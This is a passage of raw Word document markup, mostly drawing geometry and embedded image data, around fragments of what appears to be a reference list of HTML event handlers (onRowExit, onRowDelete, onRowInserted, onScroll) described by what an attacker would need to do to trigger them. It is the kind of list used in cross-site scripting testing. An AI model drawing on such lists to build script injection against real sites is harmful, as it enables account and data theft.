        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>change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row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in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data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source)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504"/>
          <w:tab w:val="left" w:pos="1506"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:hanging="1316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1904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633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="889" name="Group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166"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="890" name="Freeform 892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348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2906 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2927 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2927 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2909 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2906 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 997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" name="Text Box 89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onRowExit()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0" o:spid="_x0000_s1542" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:49.85pt;height:9.15pt;z-index:-17597440;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166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">
                <v:shape id="Freeform 892" o:spid="_x0000_s1543" style="position:absolute;left:1930;top:166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7sm8IA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdC/MP4Q64EU1VGLTTKKIILnTAx+yvze0D&#10;m5vapNr5+8lCcHk472TZmUo8qHGlZQXjUQSCOLW65FzB5bwdzkA4j6yxskwK/sjBcvHRSzDW9slH&#10;epx8LkIIuxgVFN7XsZQuLcigG9maOHCZbQz6AJtc6gafIdxUchJFX9JgyaGhwJrWBaW3U2sUHO5z&#10;udlUt9XgZ5+1rr3+Xqd6rFT/s1t9g/DU+bf45d5pBbN5mB/OhCMgF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juybwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m976,182r-955,l18,182,,161r,-3l,21,21,,976,r21,21l997,161r-18,21l976,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="976,348;21,348;18,348;0,327;0,324;0,187;21,166;976,166;997,187;997,327;979,348;976,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 891" o:spid="_x0000_s1544" type="#_x0000_t202" style="position:absolute;left:1930;top:166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c3XcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IKvdWNHoJG1yDFgiCUxvTQ4zP7&#10;TJZk36bZNab/vlso9DjMzDfMNp9sJ0YavHGsYDFPQBBXThuuFXyUr88rED4ga+wck4Jv8pDvZg9b&#10;zLS7c0HjOdQiQthnqKAJoc+k9FVDFv3c9cTRu7rBYohyqKUe8B7htpPLJEmlRcNxocGeXhqq2vPN&#10;Kth/cnEwX2+X9+JamLJcJ3xKW6WeHqf9BkSgKfyH/9pHrWC1XsDvmXg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Zzdd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onRowExit()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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>change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row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in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data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source)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673"/>
          <w:tab w:val="left" w:pos="1674"/>
        </w:tabs>
        <w:spacing w:before="160"/>
        <w:ind w:left="1673" w:hanging="1484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1955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741045" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="886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6205"/>
                          <a:chOff x="1930" y="166"/>
                          <a:chExt cx="1167" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="887" name="Freeform 889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1167" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3076 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1167"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1167"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1167"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1167"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1167"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1167"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1167"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3076 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1167"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3097 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1167"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3097 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1167"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3079 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1167"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3076 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1167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67" h="183">
                                <a:moveTo>
                                  <a:pt x="114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146" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1167" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1149" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="114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Text Box 88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11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onRowDelete()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87" o:spid="_x0000_s1545" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:8.3pt;width:58.35pt;height:9.15pt;z-index:-17596928;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,166" coordsize="116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">
                <v:shape id="Freeform 889" o:spid="_x0000_s1546" style="position:absolute;left:1930;top:166;width:1167;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="116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Su/8QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74W8g9hAL6WRU0prnCihDQQMpYf8PMBi&#10;bWwTa2Uk2VbevioEchxm5htmvY2mEyM531pWsFxkIIgrq1uuFZxP+9cchA/IGjvLpOBGHrab2dMa&#10;C20nPtB4DLVIEPYFKmhC6AspfdWQQb+wPXHyLtYZDEm6WmqHU4KbTr5l2Yc02HJaaLCnXUPV9TgY&#10;Bb+771jiz+R8LMfhfXg5H+TtqtTzPH6tQASK4RG+t0utIM8/4f9MOg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Erv/EAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m1146,182l21,182r-3,l,161r,-3l,21,21,,1146,r21,21l1167,161r-18,21l1146,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1146,348;21,348;18,348;0,327;0,324;0,187;21,166;1146,166;1167,187;1167,327;1149,348;1146,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 888" o:spid="_x0000_s1547" type="#_x0000_t202" style="position:absolute;left:1930;top:166;width:116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QIHcMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPPWvDMBDdC/0P4grdarkZguNaMaG0ECiUOM7Q8Wpd&#10;bGHr5Fpq4vz7aAhkfLzvopztIE40eeNYwWuSgiBunDbcKjjUny8ZCB+QNQ6OScGFPJTrx4cCc+3O&#10;XNFpH1oRQ9jnqKALYcyl9E1HFn3iRuLIHd1kMUQ4tVJPeI7hdpCLNF1Ki4ZjQ4cjvXfU9Pt/q2Dz&#10;w9WH+fv+3VXHytT1KuWvZa/U89O8eQMRaA538c291QqyLK6NZ+IRkO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QIHc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onRowDelete()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7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>attacker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>would</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>need</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>delete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row</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>in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data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>source)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842"/>
          <w:tab w:val="left" w:pos="1843"/>
        </w:tabs>
        <w:ind w:left="1842" w:hanging="1653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2006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848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="883" name="Group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8995" cy="116205"/>
                          <a:chOff x="1930" y="154"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="884" name="Freeform 886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1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 336 154"/>
                              <a:gd name="T3" fmla="*/ 336 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 336 154"/>
                              <a:gd name="T7" fmla="*/ 336 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 336 154"/>
                              <a:gd name="T11" fmla="*/ 336 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 315 154"/>
                              <a:gd name="T15" fmla="*/ 315 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 312 154"/>
                              <a:gd name="T19" fmla="*/ 312 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 175 154"/>
                              <a:gd name="T23" fmla="*/ 175 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 154 154"/>
                              <a:gd name="T27" fmla="*/ 154 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 154 154"/>
                              <a:gd name="T31" fmla="*/ 154 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 175 154"/>
                              <a:gd name="T35" fmla="*/ 175 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 315 154"/>
                              <a:gd name="T39" fmla="*/ 315 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 336 154"/>
                              <a:gd name="T43" fmla="*/ 336 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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16" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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Text Box 88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133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onRowInserted()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84" o:spid="_x0000_s1548" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:7.7pt;width:66.85pt;height:9.15pt;z-index:-17596416;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,154" coordsize="133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">
                <v:shape id="Freeform 886" o:spid="_x0000_s1549" style="position:absolute;left:1930;top:154;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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dzhccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74LfYXlCL6VuLKWG1FX8VxB6KI1S6O2R&#10;fSar2bchu2r003cLBY/DzPyGmcw6W4sztd44VjAaJiCIC6cNlwp22/enFIQPyBprx6TgSh5m035v&#10;gpl2F/6icx5KESHsM1RQhdBkUvqiIot+6Bri6O1dazFE2ZZSt3iJcFvL5yR5lRYNx4UKG1pWVBzz&#10;k1Ww/vnejczhoxuXy/zTpNfH22JFSj0MuvkbiEBduIf/2xutIE1f4O9MPAJy+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Xc4XHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m1316,182l21,182r-3,l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,21l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,336;21,336;18,336;0,315;0,312;0,175;21,154;1316,154;1337,175;1337,315;1319,336;1316,336" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 885" o:spid="_x0000_s1550" type="#_x0000_t202" style="position:absolute;left:1930;top:154;width:133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Wng8UA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvNWNQiVGVxGxUBCkMR56fM0+&#10;k8Xs25jdavz3XUHwOMzMN8x82dtGXKjzxrGC0TABQVw6bbhScCg+31MQPiBrbByTght5WC5eX+aY&#10;aXflnC77UIkIYZ+hgjqENpPSlzVZ9EPXEkfv6DqLIcqukrrDa4TbRo6TZCItGo4LNba0rqk87f+s&#10;gtUP5xtz3v1+58fcFMU04e3kpNTgrV/NQATqwzP8aH9pBWn6Afc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haeD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onRowInserted()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22848" behindDoc="0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321945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="880" name="Group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507"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="881" name="Freeform 883"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="506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689 507"/>
                              <a:gd name="T3" fmla="*/ 689 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 689 507"/>
                              <a:gd name="T7" fmla="*/ 689 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 688 507"/>
                              <a:gd name="T11" fmla="*/ 688 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 912"/>
                              <a:gd name="T14" fmla="+- 0 668 507"/>
                              <a:gd name="T15" fmla="*/ 668 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 912"/>
                              <a:gd name="T18" fmla="+- 0 665 507"/>
                              <a:gd name="T19" fmla="*/ 665 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 912"/>
                              <a:gd name="T22" fmla="+- 0 528 507"/>
                              <a:gd name="T23" fmla="*/ 528 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 912"/>
                              <a:gd name="T26" fmla="+- 0 507 507"/>
                              <a:gd name="T27" fmla="*/ 507 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2820 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 912"/>
                              <a:gd name="T30" fmla="+- 0 507 507"/>
                              <a:gd name="T31" fmla="*/ 507 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2842 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 912"/>
                              <a:gd name="T34" fmla="+- 0 528 507"/>
                              <a:gd name="T35" fmla="*/ 528 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2842 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 912"/>
                              <a:gd name="T38" fmla="+- 0 668 507"/>
                              <a:gd name="T39" fmla="*/ 668 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2824 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 912"/>
                              <a:gd name="T42" fmla="+- 0 688 507"/>
                              <a:gd name="T43" fmla="*/ 688 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2820 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 912"/>
                              <a:gd name="T46" fmla="+- 0 689 507"/>
                              <a:gd name="T47" fmla="*/ 6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1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06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onScroll()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81" o:spid="_x0000_s1551" style="position:absolute;left:0;text-align:left;margin-left:96.5pt;margin-top:25.35pt;width:45.6pt;height:9.15pt;z-index:15822848;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,507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">
                <v:shape id="Freeform 883" o:spid="_x0000_s1552" style="position:absolute;left:1930;top:506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yFGsQA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE7wu+w3KE3ulGL9oYsxER7Q8I4s8DHLLH&#10;bDB7NsluNX37bqHQy2FmvmHy1WAbcafe144VzKYJCOLS6ZorBZfzbpKC8AFZY+OYFHyTh1Uxesox&#10;0+7BR7qfQiUihH2GCkwIbSalLw1Z9FPXEkfv6nqLIcq+krrHR4TbRs6T5EVarDkuGGxpY6i8nb6s&#10;gu7tUBO/b+dd593rudwb87kYlHoeD+sliEBD+A//tT+0gjSdwe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MhRrEAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m890,182r-869,l18,181,,161r,-3l,21,21,,890,r22,21l912,161r-18,20l890,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="890,689;21,689;18,688;0,668;0,665;0,528;21,507;890,507;912,528;912,668;894,688;890,689" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 882" o:spid="_x0000_s1553" type="#_x0000_t202" style="position:absolute;left:1930;top:506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w/98QA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGDxKjq4hYEAqlMR48PrPP&#10;ZDH7Ns2umv77riB4HGbmG2ax6m0jbtR541jBeJSAIC6dNlwpOBSfHykIH5A1No5JwR95WC0HbwvM&#10;tLtzTrd9qESEsM9QQR1Cm0npy5os+pFriaN3dp3FEGVXSd3hPcJtIydJMpUWDceFGlva1FRe9ler&#10;YH3kfGt+v08/+Tk3RTFL+Gt6Uep92K/nIAL14RV+tndaQZpO4HEmHg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sP/f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onScroll()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23360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4257675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>321945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="579120" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="877" name="Group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6705" y="507"/>
                          <a:chExt cx="912" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="878" name="Freeform 880"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6705" y="506"/>
                            <a:ext cx="912" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 7595 6705"/>
                              <a:gd name="T1" fmla="*/ T0 w 912"/>
                              <a:gd name="T2" fmla="+- 0 689 507"/>
                              <a:gd name="T3" fmla="*/ 689 h 183"/>
                              <a:gd name="T4" fmla="+- 0 6726 6705"/>
                              <a:gd name="T5" fmla="*/ T4 w 912"/>
                              <a:gd name="T6" fmla="+- 0 689 507"/>
                              <a:gd name="T7" fmla="*/ 689 h 183"/>
                              <a:gd name="T8" fmla="+- 0 6723 6705"/>
                              <a:gd name="T9" fmla="*/ T8 w 912"/>
                              <a:gd name="T10" fmla="+- 0 688 507"/>
